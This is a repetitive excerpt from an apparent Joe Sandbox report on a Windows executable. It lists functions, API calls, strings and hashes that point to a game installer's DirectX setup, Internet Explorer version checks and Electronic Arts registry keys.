                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cf73529e59ca414800e33f6a3d27a469329b2531af2a4a51d0323622b91f33b1
                                                                                                                                              • Instruction ID: a48938021cedc7cb95ed12bdda6726682a3cd92a75fd720a002f5d4c608c8565
                                                                                                                                              • Opcode Fuzzy Hash: cf73529e59ca414800e33f6a3d27a469329b2531af2a4a51d0323622b91f33b1
                                                                                                                                              • Instruction Fuzzy Hash: 6331D636A6C4A302D348DE3ADC002737793CBC662AB1DC5B4C684D761AD53FA8439394
                                                                                                                                              Function 00424250 Relevance: .1, Instructions: 98COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 916adc14e561b3eadea8d50eb96866212fb6a3d63354d9611c4e08656ecd61d3
                                                                                                                                              • Instruction ID: e4babc745da3f29cc0684a555394302970eda1ca2e39a57ede709b7d6887d096
                                                                                                                                              • Opcode Fuzzy Hash: 916adc14e561b3eadea8d50eb96866212fb6a3d63354d9611c4e08656ecd61d3
                                                                                                                                              • Instruction Fuzzy Hash: 0731FB327002149BDB10DF69EC80967BBA5FB84320F85816AED19CB245D735F915C7E1
                                                                                                                                              Function 00416F60 Relevance: 30.0, APIs: 3, Strings: 14, Instructions: 259COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000400,?,Version,?,?,80000002,?,?,?,?), ref: 00417198
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 004171A8
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,dsetup.dll,?,?,?,?), ref: 004171C8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$Current$AddressLibraryLoadPathProcSystemTempWindows
                                                                                                                                              • String ID: %d.%d.%d$%d.%d.%d.%d$8.1$CD NEWER THAN HD$CD OLDER THAN HD$CD SAME AS HD$Software\Microsoft\DirectX$UNKNOWN$Version$Windows 2000$Windows XP$dsetup.dll$m_DirectXSetupGetVersion is NULL$oops
                                                                                                                                              • API String ID: 3989195010-3706638769
                                                                                                                                              • Opcode ID: 4f7dd495da0e88cbd4bd1521b7c72d64d317f7bf7d4b1a0ada1672d325655e65
                                                                                                                                              • Instruction ID: 82d168655b0c159cb1636abc6d3beedafcc5df099369e82530c6fe2580bb6615
                                                                                                                                              • Opcode Fuzzy Hash: 4f7dd495da0e88cbd4bd1521b7c72d64d317f7bf7d4b1a0ada1672d325655e65
                                                                                                                                              • Instruction Fuzzy Hash: 19A1A07560C380ABE324DB54C840BEBB7F9EBD5711F10491EF985932C1DB78A889CB5A
                                                                                                                                              Function 00415BE0 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 196registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Internet Explorer,00000000,00020019,?), ref: 00415C61
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Version,00000000,00000000,?,?), ref: 00415C92
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,IVer,00000000,00000000,?,?), ref: 00415D29
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00415E54
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                              • String ID: %d.%d$100$101$102$103$1215$1300$Build$IVer$Software\Microsoft\Internet Explorer$Version
                                                                                                                                              • API String ID: 1586453840-2685558121
                                                                                                                                              • Opcode ID: 5c89114449e6bc325828eae396e07a57128cb86573d4cfcd060cf77c0c08b7f8
                                                                                                                                              • Instruction ID: de899b3a32cb2af15eaa5d18eb6ecfaec54b5d6c66715f52551f9a2aa385845c
                                                                                                                                              • Opcode Fuzzy Hash: 5c89114449e6bc325828eae396e07a57128cb86573d4cfcd060cf77c0c08b7f8
                                                                                                                                              • Instruction Fuzzy Hash: 4861D3B1A047459BEB20DF14D844BEB7BE9EBC8704F144429F6449B380DB789945CB9B
                                                                                                                                              Function 00416940 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416955
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00416969
                                                                                                                                              • LoadLibraryA.KERNEL32(dsetup.dll), ref: 00416981
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DirectXSetupA), ref: 0041699A
                                                                                                                                              • GetProcAddress.KERNEL32(?,DirectXSetupGetVersion), ref: 004169BE
                                                                                                                                              • GetProcAddress.KERNEL32(?,DirectXSetupGetEULAA), ref: 004169E2
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 004169EC
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00416A18
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory$AddressProc$LibraryLoad
                                                                                                                                              • String ID: Cannot get address of DirectXSetupA$Cannot get address of DirectXSetupGetVersion$Could not load dsetup.dll$DirectXSetupA$DirectXSetupGetEULAA$DirectXSetupGetVersion$Dsetup.dll$dsetup.dll
                                                                                                                                              • API String ID: 3383375925-590746012
                                                                                                                                              • Opcode ID: 6728013ffcc9761fc737054107d104eea82b8e14e575de02be08ca56f5759ead
                                                                                                                                              • Instruction ID: 931795e1dae7218fb21f2bd96e0d81854005b1a274691680fd43d5dea92e8a10
                                                                                                                                              • Opcode Fuzzy Hash: 6728013ffcc9761fc737054107d104eea82b8e14e575de02be08ca56f5759ead
                                                                                                                                              • Instruction Fuzzy Hash: 2421F5B52413006FE320AB64AD85F9BB7A8DB95B11F11892FFE85D3281DA78D444CB39
                                                                                                                                              Function 00422B84 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(USER32), ref: 00422BAD
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00422BC9
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00422BDA
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00422BEB
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00422BFC
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00422C0D
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00422C1E
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00422C2F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                              • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                              • API String ID: 667068680-68207542
                                                                                                                                              • Opcode ID: 810a936632be2ce720fafd58cbae2f49093b75e770282222fd5374265a0f73c0
                                                                                                                                              • Instruction ID: f307c977e25abfbff0b048e106a8ea6a6bb34d05222bffd66cc64a19540436b9
                                                                                                                                              • Opcode Fuzzy Hash: 810a936632be2ce720fafd58cbae2f49093b75e770282222fd5374265a0f73c0
                                                                                                                                              • Instruction Fuzzy Hash: 9D215471A21721AB87959F767EC052FBAF4F649B853A0483FE804E2661C7B88049DF5C
                                                                                                                                              Function 00410610 Relevance: 26.5, APIs: 4, Strings: 11, Instructions: 257windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetShortPathNameA.KERNEL32(?,?,00000400), ref: 004107BD
                                                                                                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?,80000002,?), ref: 00410858
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00410866
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0041088D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessageNamePathShort
                                                                                                                                              • String ID: DirectX Installed$Game Registry$Installed From$Language$Registration$Restart$SOFTWARE\$SOFTWARE\Electronic Arts\%s\%s\ergc$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\$\$can't read setRestartFlag
                                                                                                                                              • API String ID: 3903020775-341092691
                                                                                                                                              • Opcode ID: 3d2759c5747e591e863665242978f06756fe076df6fdbafd9d5ebf5856d5d1e5
                                                                                                                                              • Instruction ID: 5a2e11cbfe557d20dc58b77cc88c52bee8573eb501d7b283b44b6156cc505af9
                                                                                                                                              • Opcode Fuzzy Hash: 3d2759c5747e591e863665242978f06756fe076df6fdbafd9d5ebf5856d5d1e5
                                                                                                                                              • Instruction Fuzzy Hash: A69122712083429BD714DF24C811BFBB7E1FBD5704F004A2EF99597280DBB9A889C799
                                                                                                                                              Function 00413B40 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 174registrylibraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                              • GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(0040476A), ref: 00413C4F
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Programs,00000000,?,0045DF18,?), ref: 00413C6F
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00413C76
                                                                                                                                              • _strrchr.LIBCMT ref: 00413D9B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
